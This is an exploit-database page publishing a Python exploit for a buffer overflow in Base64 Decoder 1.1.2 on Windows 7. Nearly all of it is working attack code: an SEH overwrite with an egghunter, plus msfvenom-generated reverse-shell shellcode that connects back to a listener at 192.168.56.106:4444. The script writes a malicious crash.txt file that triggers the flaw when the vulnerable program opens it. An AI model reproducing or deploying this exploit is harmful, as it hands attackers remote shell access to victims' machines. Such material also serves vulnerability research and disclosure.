Base64 Decoder 1.1.2 Buffer Overflow

2019.03.31
Credit: Paolo Perego
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

#!/usr/bin/env python # Exploit Title: Base64 Decoder 1.1.2 Local Buffer Overflow (SEH) + Egghunter # Date: 28.03.2019 # Exploit Author: Paolo Perego - paolo@armoredcode.com # Vendor Homepage: http://4mhz.de/b64dec.html # Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip # Version: Base64 Decoder 1.1.2 # Tested on: Windows 7 Professional SP1 x86 # Notes: this exploit implements the PoC described here: https://www.exploit-db.com/exploits/39070 junk="A" * 4 # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.106 LPORT=4444 -f py -b '\x00\x0a' buf = "w00tw00t" buf += "\xbd\x82\x38\x76\xea\xd9\xcd\xd9\x74\x24\xf4\x58\x2b" buf += "\xc9\xb1\x52\x83\xe8\xfc\x31\x68\x0e\x03\xea\x36\x94" buf += "\x1f\x16\xae\xda\xe0\xe6\x2f\xbb\x69\x03\x1e\xfb\x0e" buf += "\x40\x31\xcb\x45\x04\xbe\xa0\x08\xbc\x35\xc4\x84\xb3" buf += "\xfe\x63\xf3\xfa\xff\xd8\xc7\x9d\x83\x22\x14\x7d\xbd" buf += "\xec\x69\x7c\xfa\x11\x83\x2c\x53\x5d\x36\xc0\xd0\x2b" buf += "\x8b\x6b\xaa\xba\x8b\x88\x7b\xbc\xba\x1f\xf7\xe7\x1c" buf += "\x9e\xd4\x93\x14\xb8\x39\x99\xef\x33\x89\x55\xee\x95" buf += "\xc3\x96\x5d\xd8\xeb\x64\x9f\x1d\xcb\x96\xea\x57\x2f" buf += "\x2a\xed\xac\x4d\xf0\x78\x36\xf5\x73\xda\x92\x07\x57" buf += "\xbd\x51\x0b\x1c\xc9\x3d\x08\xa3\x1e\x36\x34\x28\xa1" buf += "\x98\xbc\x6a\x86\x3c\xe4\x29\xa7\x65\x40\x9f\xd8\x75" buf += "\x2b\x40\x7d\xfe\xc6\x95\x0c\x5d\x8f\x5a\x3d\x5d\x4f" buf += "\xf5\x36\x2e\x7d\x5a\xed\xb8\xcd\x13\x2b\x3f\x31\x0e" buf += "\x8b\xaf\xcc\xb1\xec\xe6\x0a\xe5\xbc\x90\xbb\x86\x56" buf += "\x60\x43\x53\xf8\x30\xeb\x0c\xb9\xe0\x4b\xfd\x51\xea" buf += "\x43\x22\x41\x15\x8e\x4b\xe8\xec\x59\xb4\x45\xd6\xf3" buf += "\x5c\x94\x26\x15\xc1\x11\xc0\x7f\xe9\x77\x5b\xe8\x90" buf += "\xdd\x17\x89\x5d\xc8\x52\x89\xd6\xff\xa3\x44\x1f\x75" buf += "\xb7\x31\xef\xc0\xe5\x94\xf0\xfe\x81\x7b\x62\x65\x51" buf += "\xf5\x9f\x32\x06\x52\x51\x4b\xc2\x4e\xc8\xe5\xf0\x92" buf += "\x8c\xce\xb0\x48\x6d\xd0\x39\x1c\xc9\xf6\x29\xd8\xd2" buf += "\xb2\x1d\xb4\x84\x6c\xcb\x72\x7f\xdf\xa5\x2c\x2c\x89" buf += "\x21\xa8\x1e\x0a\x37\xb5\x4a\xfc\xd7\x04\x23\xb9\xe8" buf += "\xa9\xa3\x4d\x91\xd7\x53\xb1\x48\x5c\x63\xf8\xd0\xf5" buf += "\xec\xa5\x81\x47\x71\x56\x7c\x8b\x8c\xd5\x74\x74\x6b" buf += "\xc5\xfd\x71\x37\x41\xee\x0b\x28\x24\x10\xbf\x49\x6d" junk += buf print "filling with " + str(490-len(junk)) junk += "A" * (490 -len(junk)) junk+="\x90\x90\x90\x90" junk+="\x90\x90\x90\x90" # msf-egghunter -f raw -e w00t -a x86 -p windows | msfvenom -a x86 --platform windows -f py -b '\x00' -v egg egg = "" egg += "\xb8\x2e\x04\x6d\x70\xdb\xd5\xd9\x74\x24\xf4\x5a\x2b" egg += "\xc9\xb1\x09\x31\x42\x12\x83\xea\xfc\x03\x6c\x0a\x8f" egg += "\x85\x16\x93\x85\x99\xd9\xd1\x4b\x0c\xe7\x8d\xa6\xfe" egg += "\xdb\x28\x63\x8b\xcc\x8b\xe4\x43\x22\x98\x83\x73\xed" egg += "\x15\x7e\xd4\x84\x32\x81\xcc" junk += egg junk += "A"*(620-len(junk)) junk+="\xeb\x80\x90\x90" # POP-POP-RET is on 0x00401414 junk+="\x14\x14\x40" f=open("crash.txt", "w") f.write(junk) f.close


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top